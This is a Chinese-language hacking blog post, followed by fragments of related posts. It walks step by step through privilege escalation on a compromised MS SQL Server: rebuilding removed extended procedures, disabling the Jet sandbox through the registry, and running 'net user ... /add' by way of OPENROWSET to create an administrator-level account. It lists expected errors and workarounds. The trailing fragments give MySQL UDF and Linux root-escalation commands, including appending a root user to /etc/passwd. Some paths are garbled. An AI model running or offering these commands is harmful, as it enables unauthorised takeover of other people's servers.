今天偶然發現有乙個sa許可權。伺服器管理員將大部份擴充套件都刪除了。最後自己重建sp_makewebtask儲存才搞到乙個webshell了。(重建辦法,先找臺正常主機,sp_helptext sp_makewebtask,將他的sql語句重新拷到目標機器執行一次就行了)。
當然有了webshell,無法滿足我們貪婪的慾望。開始測試提權。有serv-u,但是提權失敗了。也許大家會說用back log來提權。但是那個太慢了,要重啟機器,會影響對方業務,同時又會給對方留下不好的印像。有人也許會說用讀取系統賬號的登錄檔,匯入匯出,轉殖賬號,這個辦法也可行,但由於並非黑對方主機,還是要保證對方系統的安整性比較好。(也許是心理因素,^_^)
最後只好試試沙盒模式。很多人sa直接用沙盒模式成功了好多機器,但我從來沒實踐過,也不太清楚成功率如何。只好拿他當回肉雞嘗試了。
由於擴充套件被刪除,先恢復對登錄檔的讀寫儲存。
dbcc addextendedproc (xp_regread,xpstar.dll)
dbcc addextendedproc (xp_regwrite,xpstar.dll)
修復沙盒的保護模式
exec master..xp_regwrite hkey_local_machine,softwaremicrosoftjet4.0engines,sandboxmode,reg_dword,0;--
檢視sandboxmode值是否已經變成0了。
exec master.dbo.xp_regread hkey_local_machine,softwaremicrosoftjet4.0engines, sandboxmode
最後呼叫沙盒模式
select * from openrowset(microsoft.jet.oledb.4.0,;database=c:windowssystem32iasdnary.mdb,select shell("cmd.exe /c net user user passwd /add"))
1.如果沙盒保護模式未「關閉」,會報錯:
伺服器: 訊息 7357,級別 16,狀態 2,行 1
未能處理物件 select shell("cmd.exe /c net user user passwd /add")。ole db 提供程式 microsoft.jet.oledb.4.0 指出該物件中沒有任何列。
ole db 錯誤跟蹤[non-inte***ce error: ole db provider unable to process object, since the object has no columnsprovidername=microsoft.jet.oledb.4.0, query=select shell("cmd.exe /c net user user passwd /add")]。
2.如果.mdb不存在或是輸入路徑錯誤
伺服器: 訊息 7399,級別 16,狀態 1,行 1
ole db 提供程式 microsoft.jet.oledb.4.0 報錯。
[ole/db provider returned message: 找不到檔案 c:windowssystem32iasdnary1.mdb。]
ole db 錯誤跟蹤[ole/db provider microsoft.jet.oledb.4.0 idbinitialize::initialize returned 0x80004005: ]。
3.如果輸入過程中多了一些空格,也會報錯。尤其要注意這點,很多人直接網上找文章複製貼上進去執行。
伺服器: 訊息 7357,級別 16,狀態 2,行 1
未能處理物件 select shell("cmd.exe /c net user user passwd /add")。ole db 提供程式 microsoft.jet.oledb.4.0 指出該物件中沒有任何列。
ole db 錯誤跟蹤[non-inte***ce error: ole db provider unable to process object, since the object has no columnsprovidername=microsoft.jet.oledb.4.0, query=select shell("cmd.exe /c net user user passwd /add")]。
4.如果mdb許可權和cmd.exe許可權不對,同樣會也出現問題。
當mdb許可權不對時,
伺服器: 訊息 7320,級別 16,狀態 2,行 1
未能對 ole db 提供程式 microsoft.jet.oledb.4.0 執行查詢。
[ole/db provider returned message: 未知]
ole db 錯誤跟蹤[ole/db provider microsoft.jet.oledb.4.0 icommandtext::execute returned 0x80040e14]。
5.如果net許可權不對時,卻沒有任何提示。
最終的提權辦法就是在當前的web目錄下面上傳系統的ias.mdb和cmd.exe,net.exe三個檔案。執行
select * from openrowset(microsoft.jet.oledb.4.0,;database=e:webias.mdb,select shell("e:webcmd.exe /c e:webnet.exe user user passwd /add"))
成功增加乙個計算機使用者。
MySQL擴充套件介面UDF提權
1.udf介紹 udf user defined function 是mysql的乙個拓展介面,也稱為自定義函式。2.udf提權條件 1 目標系統是windows win2000,xp,win2003 2 可以將udf.dll寫入到相應目錄的許可權。如果 mysql版本大於5.1版本,udf.dll...
Linux提權的N個方法
將john寫入root使用者組裡 echo john 0 0 bin bash sudo teehee a etc passwd要被分配root許可權 檢視命令find perm u s type f 2 dev null select sys exec usermod ag admin 使用者id...
MySQL提權簡單方法
孤水繞城 s blog 前不久網上公開了乙個mysql func的漏洞,講的是使用mysql建立乙個自定義的函式,然後通過這個函式來攻擊伺服器。最早看到相關的報道是在o otik上,但是公布的是針對unix系統的exploit,並且成功率也不是很高.而近期,國內有高手放出針對win系統的相關文章,於...